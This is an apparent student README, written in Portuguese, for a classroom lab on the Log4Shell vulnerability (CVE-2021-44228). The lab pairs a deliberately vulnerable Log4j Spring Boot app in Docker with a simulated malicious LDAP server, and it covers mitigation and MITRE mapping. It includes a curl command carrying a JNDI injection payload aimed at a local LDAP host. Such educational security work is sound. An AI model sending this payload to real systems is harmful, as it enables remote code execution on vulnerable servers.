
Demonstração de exploração do Log4Shell (CVE-2021-44228) para SEAS 8405. Inclui um aplicativo Spring Boot vulnerável, servidor LDAP falso, configuração Docker, mapeamento MITRE, resposta a incidentes e uma gravação completa de tela.
Este projeto demonstra a exploração e mitigação da vulnerabilidade Log4Shell (CVE-2021-44228) usando uma aplicação web Java em Docker com Log4j 2.14.1 vulnerável. A configuração também inclui um servidor LDAP malicioso simulado para demonstrar o caminho de ataque de injeção JNDI.
Após a exploração, o sistema é fortalecido atualizando o Log4j, validando a entrada e aplicando as recomendações MITRE D3FEND e ATT&CK.
log4shell-homework9/
├── docker-compose.yml
├── Dockerfile
├── pom.xml
├── ldap_server.py
├── src/...
├── architecture_diagram.png
├── README.md
├── mitigation_report.pdf
docker build -t vulnerable-app .
docker-compose up
A aplicação estará disponível em:
http://localhost:8080
python3 ldap_server.py
Envie uma requisição como esta para a aplicação:
curl http://localhost:8080?input=${jndi:ldap://localhost:8000/Exploit}
O servidor LDAP deve receber a requisição (isso simula o ataque JNDI).
Após demonstrar o ataque, o sistema foi protegido por:
${jndi:...})Veja mitigation_report.pdf para:
Se o vídeo não for enviado diretamente, ele está disponível no link do relatório.
Serpil Rivas
SEAS 8405 – Arquiteturas de Cibersegurança
Maio de 2025